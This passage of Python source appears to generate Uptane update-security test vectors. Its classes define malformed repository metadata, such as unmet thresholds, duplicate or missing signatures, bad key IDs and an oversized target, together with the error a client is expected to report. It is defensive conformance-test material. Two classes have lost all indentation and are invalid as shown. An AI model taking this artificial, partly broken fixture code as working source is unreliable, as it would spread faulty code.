        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }

    STEPS = [
        (DirectorStep, ImageStep),
    ]


class ImageRepoTargetsUnmetThresholdUptane(Uptane):
    '''The image repo targets metadata has an unmet threshold'''

    class ImageStep(Step):
        UPDATE_ERROR = 'UnmetThreshold::Targets'
        TARGETS_KEYS_IDX = [1, 6]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'root_keys_idx': [0],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            # Sign with all but the last declared key -> threshold unmet.
            'targets_keys_idx': TARGETS_KEYS_IDX[0:-1],
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }

    class DirectorStep(Step):
        TARGETS_KEYS_IDX = [5]
        ROOT_KWARGS = {
            'root_keys_idx': [4],
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }

    STEPS = [
        (DirectorStep, ImageStep),
    ]


class ImageRepoSnapshotUnmetThresholdUptane(Uptane):
    '''The image repo snapshot metadata has an unmet threshold'''

    class ImageStep(Step):
        UPDATE_ERROR = 'UnmetThreshold::Snapshot'
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2, 6]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'root_keys_idx': [0],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        SNAPSHOT_KWARGS = {
            # Sign with all but the last declared key -> threshold unmet.
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX[0:-1],
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }

    class DirectorStep(Step):
        TARGETS_KEYS_IDX = [5]
        ROOT_KWARGS = {
            'root_keys_idx': [4],
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }

    STEPS = [
        (DirectorStep, ImageStep),
    ]


class ImageRepoTimestampUnmetThresholdUptane(Uptane):
    '''The image repo timestamp metadata has an unmet threshold'''

    class ImageStep(Step):
        UPDATE_ERROR = 'UnmetThreshold::Timestamp'
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3, 6]
        ROOT_KWARGS = {
            'root_keys_idx': [0],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
        }
        TIMESTAMP_KWARGS = {
            # Sign with all but the last declared key -> threshold unmet.
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX[0:-1],
        }

    class DirectorStep(Step):
        TARGETS_KEYS_IDX = [5]
        ROOT_KWARGS = {
            'root_keys_idx': [4],
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }

    STEPS = [
        (DirectorStep, ImageStep),
    ]
class DirectorRootNonUniqueSignaturesUptane(Uptane):
'''The director root metadata has duplicate signatures'''
class ImageStep(Step):
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
UPDATE_ERROR = 'NonUniqueSignatures::Root'
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'root_sign_keys_idx': [4, 4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class DirectorTargetsNonUniqueSignaturesUptane(Uptane):
'''The director targets metadata has duplicate signatures'''
class ImageStep(Step):
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
UPDATE_ERROR = 'NonUniqueSignatures::Targets'
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
'targets_sign_keys_idx': TARGETS_KEYS_IDX + TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class ImageRepoRootNonUniqueSignaturesUptane(Uptane):
    '''The image repo root metadata has duplicate signatures'''
    class ImageStep(Step):
        # The client is expected to reject the update with this error.
        UPDATE_ERROR = 'NonUniqueSignatures::Root'
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'root_keys_idx': [0],
            # Fault: the same key signs twice -> duplicate signatures on root.
            'root_sign_keys_idx': [0, 0],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
    class DirectorStep(Step):
        # Healthy director: root key idx 4, targets key idx 5.
        TARGETS_KEYS_IDX = [5]
        ROOT_KWARGS = {
            'root_keys_idx': [4],
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
    STEPS = [
        (DirectorStep, ImageStep),
    ]
class ImageRepoTargetsNonUniqueSignaturesUptane(Uptane):
    '''The image repo targets metadata has duplicate signatures'''
    class ImageStep(Step):
        # The client is expected to reject the update with this error.
        UPDATE_ERROR = 'NonUniqueSignatures::Targets'
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'root_keys_idx': [0],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
            # Fault: sign targets with the same key list twice -> duplicates.
            'targets_sign_keys_idx': TARGETS_KEYS_IDX + TARGETS_KEYS_IDX,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
    class DirectorStep(Step):
        # Healthy director: root key idx 4, targets key idx 5.
        TARGETS_KEYS_IDX = [5]
        ROOT_KWARGS = {
            'root_keys_idx': [4],
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
    STEPS = [
        (DirectorStep, ImageStep),
    ]
class ImageRepoSnapshotNonUniqueSignaturesUptane(Uptane):
    '''The image repo snapshot metadata has duplicate signatures'''
    class ImageStep(Step):
        # The client is expected to reject the update with this error.
        UPDATE_ERROR = 'NonUniqueSignatures::Snapshot'
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'root_keys_idx': [0],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            # Fault: sign snapshot with the same key list twice -> duplicates.
            'snapshot_sign_keys_idx': SNAPSHOT_KEYS_IDX + SNAPSHOT_KEYS_IDX,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
    class DirectorStep(Step):
        # Healthy director: root key idx 4, targets key idx 5.
        TARGETS_KEYS_IDX = [5]
        ROOT_KWARGS = {
            'root_keys_idx': [4],
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
    STEPS = [
        (DirectorStep, ImageStep),
    ]
class ImageRepoTimestampNonUniqueSignaturesUptane(Uptane):
    '''The image repo timestamp metadata has duplicate signatures'''
    class ImageStep(Step):
        # The client is expected to reject the update with this error.
        UPDATE_ERROR = 'NonUniqueSignatures::Timestamp'
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'root_keys_idx': [0],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
            # Fault: sign timestamp with the same key list twice -> duplicates.
            'timestamp_sign_keys_idx': TIMESTAMP_KEYS_IDX + TIMESTAMP_KEYS_IDX,
        }
    class DirectorStep(Step):
        # Healthy director: root key idx 4, targets key idx 5.
        TARGETS_KEYS_IDX = [5]
        ROOT_KWARGS = {
            'root_keys_idx': [4],
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
    STEPS = [
        (DirectorStep, ImageStep),
    ]
################################
class DirectorRootUnsignedUptane(Uptane):
    '''The director root metadata has no signatures'''
    class ImageStep(Step):
        # Healthy image repo: keys 0-3 cover root/targets/snapshot/timestamp.
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'root_keys_idx': [0],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
    class DirectorStep(Step):
        # The client is expected to reject the update with this error.
        UPDATE_ERROR = 'UnmetThreshold::Root'
        TARGETS_KEYS_IDX = [5]
        ROOT_KWARGS = {
            'root_keys_idx': [4],
            # Fault: empty signing-key list -> root carries zero signatures.
            'root_sign_keys_idx': [],
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
    STEPS = [
        (DirectorStep, ImageStep),
    ]
class DirectorTargetsUnsignedUptane(Uptane):
    '''The director targets metadata has no signatures'''
    class ImageStep(Step):
        # Healthy image repo: keys 0-3 cover root/targets/snapshot/timestamp.
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'root_keys_idx': [0],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
    class DirectorStep(Step):
        # The client is expected to reject the update with this error.
        UPDATE_ERROR = 'UnmetThreshold::Targets'
        TARGETS_KEYS_IDX = [5]
        ROOT_KWARGS = {
            'root_keys_idx': [4],
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
            # Fault: empty signing-key list -> targets carries zero signatures.
            'targets_sign_keys_idx': [],
        }
    STEPS = [
        (DirectorStep, ImageStep),
    ]
class ImageRepoRootUnsignedUptane(Uptane):
    '''The image repo root metadata has no signatures'''
    class ImageStep(Step):
        # The client is expected to reject the update with this error.
        UPDATE_ERROR = 'UnmetThreshold::Root'
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'root_keys_idx': [0],
            # Fault: empty signing-key list -> root carries zero signatures.
            'root_sign_keys_idx': [],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
    class DirectorStep(Step):
        # Healthy director: root key idx 4, targets key idx 5.
        TARGETS_KEYS_IDX = [5]
        ROOT_KWARGS = {
            'root_keys_idx': [4],
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
    STEPS = [
        (DirectorStep, ImageStep),
    ]
class ImageRepoTargetsUnsignedUptane(Uptane):
    '''The image repo targets metadata has no signatures'''
    class ImageStep(Step):
        # The client is expected to reject the update with this error.
        UPDATE_ERROR = 'UnmetThreshold::Targets'
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'root_keys_idx': [0],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
            # Fault: empty signing-key list -> targets carries zero signatures.
            'targets_sign_keys_idx': [],
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
    class DirectorStep(Step):
        # Healthy director: root key idx 4, targets key idx 5.
        TARGETS_KEYS_IDX = [5]
        ROOT_KWARGS = {
            'root_keys_idx': [4],
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
    STEPS = [
        (DirectorStep, ImageStep),
    ]
class ImageRepoSnapshotUnsignedUptane(Uptane):
    '''The image repo snapshot metadata has no signatures'''
    class ImageStep(Step):
        # The client is expected to reject the update with this error.
        UPDATE_ERROR = 'UnmetThreshold::Snapshot'
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'root_keys_idx': [0],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            # Fault: empty signing-key list -> snapshot carries zero signatures.
            'snapshot_sign_keys_idx': [],
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
    class DirectorStep(Step):
        # Healthy director: root key idx 4, targets key idx 5.
        TARGETS_KEYS_IDX = [5]
        ROOT_KWARGS = {
            'root_keys_idx': [4],
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
    STEPS = [
        (DirectorStep, ImageStep),
    ]
class ImageRepoTimestampUnsignedUptane(Uptane):
    '''The image repo timestamp metadata has no signatures'''
    class ImageStep(Step):
        # The client is expected to reject the update with this error.
        UPDATE_ERROR = 'UnmetThreshold::Timestamp'
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'root_keys_idx': [0],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
            # Fault: empty signing-key list -> timestamp carries zero signatures.
            'timestamp_sign_keys_idx': [],
        }
    class DirectorStep(Step):
        # Healthy director: root key idx 4, targets key idx 5.
        TARGETS_KEYS_IDX = [5]
        ROOT_KWARGS = {
            'root_keys_idx': [4],
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
    STEPS = [
        (DirectorStep, ImageStep),
    ]
class DirectorRootBadKeyIdsUptane(Uptane):
    '''The director root metadata has bad key IDs for the root role'''
    class ImageStep(Step):
        # Healthy image repo: keys 0-3 cover root/targets/snapshot/timestamp.
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'root_keys_idx': [0],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
    class DirectorStep(Step):
        # The client is expected to reject the update with this error.
        UPDATE_ERROR = 'BadKeyId'
        ROOT_KEYS_IDX = [4]
        TARGETS_KEYS_IDX = [5]
        ROOT_KWARGS = {
            'root_keys_idx': ROOT_KEYS_IDX,
            # Fault: corrupt the declared key IDs for the root role's own keys.
            'root_bad_key_ids': ROOT_KEYS_IDX,
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
    STEPS = [
        (DirectorStep, ImageStep),
    ]
class DirectorTargetsBadKeyIdsUptane(Uptane):
    '''The director root metadata has bad key IDs for the targets role'''
    class ImageStep(Step):
        # Healthy image repo: keys 0-3 cover root/targets/snapshot/timestamp.
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'root_keys_idx': [0],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
    class DirectorStep(Step):
        # The client is expected to reject the update with this error.
        UPDATE_ERROR = 'BadKeyId'
        TARGETS_KEYS_IDX = [5]
        ROOT_KWARGS = {
            'root_keys_idx': [4],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            # Fault: root declares corrupted key IDs for the targets role.
            'targets_bad_key_ids': TARGETS_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
    STEPS = [
        (DirectorStep, ImageStep),
    ]
class ImageRepoRootBadKeyIdsUptane(Uptane):
    '''The image repo root metadata has bad key IDs for the root role'''
    class ImageStep(Step):
        # The client is expected to reject the update with this error.
        UPDATE_ERROR = 'BadKeyId'
        ROOT_KEYS_IDX = [0]
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'root_keys_idx': ROOT_KEYS_IDX,
            # Fault: corrupt the declared key IDs for the root role's own keys.
            'root_bad_key_ids': ROOT_KEYS_IDX,
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
    class DirectorStep(Step):
        # Healthy director: root key idx 4, targets key idx 5.
        TARGETS_KEYS_IDX = [5]
        ROOT_KWARGS = {
            'root_keys_idx': [4],
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
    STEPS = [
        (DirectorStep, ImageStep),
    ]
class ImageRepoTargetsBadKeyIdsUptane(Uptane):
    '''The image repo root metadata has bad key IDs for the targets role'''
    class ImageStep(Step):
        # The client is expected to reject the update with this error.
        UPDATE_ERROR = 'BadKeyId'
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'root_keys_idx': [0],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            # Fault: root declares corrupted key IDs for the targets role.
            'targets_bad_key_ids': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
    class DirectorStep(Step):
        # Healthy director: root key idx 4, targets key idx 5.
        TARGETS_KEYS_IDX = [5]
        ROOT_KWARGS = {
            'root_keys_idx': [4],
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
    STEPS = [
        (DirectorStep, ImageStep),
    ]
class ImageRepoSnapshotBadKeyIdsUptane(Uptane):
    '''The image repo root metadata has bad key IDs for the snapshot role'''
    class ImageStep(Step):
        # The client is expected to reject the update with this error.
        UPDATE_ERROR = 'BadKeyId'
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'root_keys_idx': [0],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            # Fault: root declares corrupted key IDs for the snapshot role.
            'snapshot_bad_key_ids': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
    class DirectorStep(Step):
        # Healthy director: root key idx 4, targets key idx 5.
        TARGETS_KEYS_IDX = [5]
        ROOT_KWARGS = {
            'root_keys_idx': [4],
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
    STEPS = [
        (DirectorStep, ImageStep),
    ]
class ImageRepoTimestampBadKeyIdsUptane(Uptane):
    '''The image repo root metadata has bad key IDs for the timestamp role'''
    class ImageStep(Step):
        # The client is expected to reject the update with this error.
        UPDATE_ERROR = 'BadKeyId'
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'root_keys_idx': [0],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
            # Fault: root declares corrupted key IDs for the timestamp role.
            'timestamp_bad_key_ids': TIMESTAMP_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
    class DirectorStep(Step):
        # Healthy director: root key idx 4, targets key idx 5.
        TARGETS_KEYS_IDX = [5]
        ROOT_KWARGS = {
            'root_keys_idx': [4],
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
    STEPS = [
        (DirectorStep, ImageStep),
    ]
class DirectorTargetOversizedUptane(Uptane):
    '''The director's metadata states that a target is smaller than it actually is.
    The target metadata in image and director do not match.
    '''
    class ImageStep(Step):
        # Expected per-target error reported by the client.
        TARGET_ERRORS = {
            DEFAULT_TARGET_NAME: 'TargetMismatch',
        }
        TARGETS_KEYS_IDX = [1]
        SNAPSHOT_KEYS_IDX = [2]
        TIMESTAMP_KEYS_IDX = [3]
        ROOT_KWARGS = {
            'root_keys_idx': [0],
            'targets_keys_idx': TARGETS_KEYS_IDX,
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
        TARGETS_KWARGS = {
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        SNAPSHOT_KWARGS = {
            'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
        }
        TIMESTAMP_KWARGS = {
            'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
        }
    class DirectorStep(Step):
        TARGETS_KEYS_IDX = [5]
        ROOT_KWARGS = {
            'root_keys_idx': [4],
            'targets_keys_idx': TARGETS_KEYS_IDX,
        }
        # Fault: the 'oversized' alteration makes the director describe the
        # default target with a smaller size than its actual content.
        def __targets(hardware_id: str, ecu_identifier: str = None) -> list:
            return [Target(name=DEFAULT_TARGET_NAME,
                           content=DEFAULT_TARGET_CONTENT,
                           hardware_id=hardware_id,
                           ecu_identifier=ecu_identifier,
                           alteration='oversized')]
